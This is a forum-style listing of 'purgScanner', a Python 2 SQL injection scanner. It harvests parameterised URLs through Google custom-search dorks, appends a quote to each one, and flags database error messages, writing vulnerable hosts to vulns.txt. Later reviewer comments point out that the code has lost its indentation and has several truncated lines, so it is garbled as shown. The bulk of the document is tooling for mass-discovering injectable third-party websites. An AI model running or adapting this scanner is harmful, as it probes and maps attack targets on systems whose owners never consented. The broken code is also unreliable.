
Python SQLi Scanner by rCom


sQuo

# ___ __ _________ ____ _/ /____ ______ __# / _ \/ // / __/ _ `/ _ `/ __/ _ \/ __/ // /

# / .__/\_,_/_/ \_, /\_,_/\__/\___/_/ \_, /

# /_/ /___/ /___/

# ___________ _ __

# SQLi Scanner by rCom / __/ __/ -_) |/|/ /

# [email protected] \__/_/ \__/|__,__/

#

#####################################################


Code:
>#!/usr/bin/python
# ___ __ _________ ____ _/ /____ ______ __
# / _ \/ // / __/ _ `/ _ `/ __/ _ \/ __/ // /
# / .__/\_,_/_/ \_, /\_,_/\__/\___/_/ \_, /
# /_/ /___/ /___/
# ___________ _ __
# SQLi Scanner by rCom / __/ __/ -_) |/|/ /
# [email protected] \__/_/ \__/|__,__/
#
#####################################################

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os
from random import choice
from optparse import OptionParser
# Clear the terminal before any output: 'cls' on Windows (os.name == 'nt'),
# 'clear' everywhere else.
os.system('cls' if os.name == 'nt' else 'clear')

# Worker bookkeeping and network settings.
threads = []                        # injThread objects started by the main script
numthreads = 8                      # number of worker threads the URL list is split across
timeout = 4                         # seconds; applied process-wide to every new socket
socket.setdefaulttimeout(timeout)

version = '0.1a'
ldm = 'jun_22_09'

# Not referenced anywhere else in the visible listing.
rSA = [2, 3, 4, 5, 6]

# Custom-search identifiers keyed by engine name. The visible code never reads
# this table; the -e option value is used directly instead.
CXdic = {
    'blackle': '013269018370076798483:gg7jrrhpsy4',
    'ssearch': '008548304570556886379:0vtwavbfaqe',
    'redfront': '017478300291956931546:v0vo-1jh2y4',
}

# Label -> database error text searched for in HTTP responses by ClassicINJ.
# Every entry is raw driver/engine error output, so an application that shows
# generic error pages gives these patterns nothing to match.
SQLeD = {
    'MySQL(Syntax)': 'error in your SQL syntax',
    'MySQL(fetch_array)': 'mysql_fetch_array',
    'MySQL(fetch_assoc)': 'mysql_fetch_assoc',
    'MySQL(num_rows)': 'mysql_num_rows',
    'MSSQL_OLEdb': 'Microsoft OLE DB Provider',
    'MSSQL_Uqm': 'Unclosed quotation mark',
    'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
}

# File types accepted for the -f option; anything else falls back to php.
filetypes = ['php', 'php2', 'asp', 'aspx', 'jsp', 'htm', 'html']

# User-Agent pool. searchIt picks one at random for each search request;
# ClassicINJ does not set a User-Agent, so these strings are not sent to the
# sites being probed.
header = [
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
    'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
    'Microsoft Internet Explorer/4.0b1 (Windows 95)',
    'Opera/8.00 (Windows NT 5.1; U; en)',
]

# Value sent as the num= parameter of each search request.
gnum = 100

# searchIt: page through a Google custom-search front end and return candidate URLs.
#
# NOTE(review): this listing lost its indentation when the page was extracted,
# and three lines below are truncated (the `while` line, the `strreg` line and
# the first `re.search` filter line). The function does not parse as shown; the
# comments describe only what the surviving text establishes.
#
# Parameters, as used in the intact lines:
#   go_dork, go_ftype - strings joined with '+' into the q= query parameter
#   go_search         - string placed directly after 'cse?' in the request URL
#   maxc              - not referenced in any intact line; presumably the bound
#                       in the truncated `while` condition - unconfirmed
# Returns finalList: URLs that contain "=", at most one per host.
def searchIt(go_dork,go_search,go_ftype,maxc):
uRLS = []
counter = 0
# (truncated line) the loop condition is lost; a FileCookieJar is created for the search requests
while counter jar = cookielib.FileCookieJar("cookies")
query = 'q='+go_dork+'+'+go_ftype
# num= comes from the module-level gnum, start= from the running counter
results_web = 'http://www.google.com/cse?'+go_search+'&'+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N'
request_web = urllib2.Request(results_web)
# one User-Agent from the module-level `header` list is chosen at random per request
agent = random.choice(header)
request_web.add_header('User-Agent', agent)
opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
text = opener_web.open(request_web).read()
# (truncated line) a regex is compiled and applied to the response body; the pattern itself is lost
strreg = re.compile('(?names = strreg.findall(text)
# advance to the next result page
counter += 100
for name in names:
if name not in uRLS:
# (truncated line) results containing "(" are skipped; the rest of this condition is lost
if re.search(r'\(', name) or re.search("pass
# also skip results matching "google", "youtube", ".gov" or "%";
# these are regexes, so the "." in ".gov" matches any character
elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("%", name):
pass
else:
uRLS.append(name)
# second pass: keep one URL per host, and only URLs that carry a "=" (a query parameter)
tmpList = []; finalList = []
for entry in uRLS:
try:
# for "scheme://host/path" the third "/"-separated field is the host
t2host = entry.split("/",3)
domain = t2host[2]
if domain not in tmpList and "=" in entry:
finalList.append(entry)
tmpList.append(domain)
# bare except: entries with fewer than three "/"-separated parts are dropped silently
except:
pass
print "\n[!] - Starting scan please wait...."
return finalList

# injThread: worker thread that runs ClassicINJ over its own list of URLs.
# NOTE(review): indentation was lost in extraction; the method structure below
# is read from the `def` lines, not from column position.
class injThread(threading.Thread):
# hosts: the URLs this worker will process
def __init__(self,hosts):
# fcount counts KeyboardInterrupt exceptions caught in run()
self.hosts=hosts;self.fcount = 0
# cooperative stop flag: read by run(), cleared by stop()
self.check = True
threading.Thread.__init__(self)

# Thread body: call ClassicINJ on each URL until the list is exhausted or the stop flag is cleared.
def run (self):
# work on a copy of the host list
urls = list(self.hosts)
for url in urls:
try:
if self.check == True:
ClassicINJ(url)
else:
break
# NOTE(review): KeyboardInterrupt is normally raised in the main thread, so this
# handler is unlikely to run inside a worker - confirm
except(KeyboardInterrupt):
self.fcount+=1

# Ask the worker to stop before its next URL; a request already in progress is not interrupted.
def stop(self):
self.check = False


# ClassicINJ: request `url` with a single quote appended and search the response
# for the database error strings listed in SQLeD.
#   url - string; the quote is appended to its end unchanged
# On a match it prints a "Found"/"Error" pair and appends the probed URL to
# vulns.txt in the current directory. Nothing is returned.
# The check depends entirely on the application echoing raw database error text;
# parameterized queries and generic error pages leave it nothing to match.
# NOTE(review): indentation was lost in extraction, so the nesting of the
# file-writing lines and of the `else` branch is inferred, not shown.
def ClassicINJ(url):
EXT = "'"
host = url+EXT
try:
# plain urlopen: none of the User-Agent strings in `header` are applied to this request
source = urllib2.urlopen(host).read()
# each SQLeD value is used as a regular expression against the whole response body;
# `type` shadows the builtin of the same name inside this function
for type,eMSG in SQLeD.items():
if re.search(eMSG, source):
print "\n[!] - Found: ", host
print "[!] - Error: ", type, "\n"
savefile = "vulns.txt"
# append mode: results accumulate across runs
saved = open(savefile, "a")
saved.write(host+'\n')
# NOTE(review): objects returned by open() have no remove_duplicates() method, so this
# line raises AttributeError; the bare except below catches it, which skips
# saved.close() and the remaining SQLeD patterns
saved.remove_duplicates()
saved.close()
else:
pass
# bare except: network errors, timeouts and the AttributeError above all end up here
# and are reported only as "Trying"
except:
print "[?] - Trying: ", host
# Script entry: parse the command-line options, print the banner, build the
# search terms, collect URLs with searchIt, then split them across injThread workers.
# NOTE(review): indentation was lost in extraction and two lines in the thread
# fan-out (`if len(threads) ...` and `if (z ...`) are truncated; their original
# conditions cannot be recovered from this page.
parser = OptionParser()
parser.add_option("-d" ,type='string', dest='dork',action='store', help="Dork: dork to search for i.e: index.php?id=")
parser.add_option("-f", type='string', dest='filetype',action='store', default='php', help="Filetype: Type of file i.e php,asp,aspx (def: php)")
parser.add_option("-e", type='string', dest='engine', action='store', default='blackle', help="Search: Engine to use blackle,ssearch,redfront (def: blackle)")
# -m is stored as a string (default '500') and is later passed to searchIt unchanged
parser.add_option("-m", type='string', dest='maxcount',action='store',default='500', help="Results: Maximum number of results to return (def: 500)")
(options, args) = parser.parse_args()
print "\t\t\t+##################################+"
print "\t\t\t# #"
print "\t\t\t# purgScanner #"
print "\t\t\t# coded by rCom #"
print "\t\t\t# -h for help #"
print "\t\t\t# #"
print "\t\t\t+##################################+"

# go_dork is assigned only when -d was supplied
if options.dork != None:
print "\n\n[!] | Dork: \t",options.dork.upper()
go_dork = 'inurl:'+options.dork

if options.dork != None:
# a file type outside `filetypes` falls back to php, although the "Type" line
# printed below still shows the value the user supplied
if options.filetype in filetypes:
go_ftype = 'inurl:'+options.filetype
else:
go_ftype = 'inurl:php'

# the engine name is used directly; the CXdic table is not consulted
go_search = 'engine:'+options.engine.upper()
print "[!] | Type: \t"+options.filetype.upper()
print "[!] | Engine: \t"+options.engine.upper()
print "\n[!] Starting search please wait...."

# NOTE(review): if this call sits at top level (nesting is not recoverable), running
# without -d would reach it with go_dork and go_ftype unassigned
cuRLS = searchIt(go_dork,go_search,go_ftype,options.maxcount)
fin = True
while fin == True:
# i = URLs per worker, m = remainder left after an even split
i = len(cuRLS) / int(numthreads)
m = len(cuRLS) % int(numthreads)
z = 0
# (truncated line) the condition on len(threads) is lost; one slice is taken per worker
if len(threads) for x in range(0, int(numthreads)):
sliced = cuRLS[x*i:(x+1)*i]
# (truncated line) presumably hands one leftover URL to this worker while z is below m - unconfirmed
if (z sliced.append(cuRLS[int(numthreads)*i+z])
z += 1
thread = injThread(sliced)
thread.start()
threads.append(thread)
# wait for every worker to finish, then exit the process
for thread in threads:
thread.join()
sys.exit()
 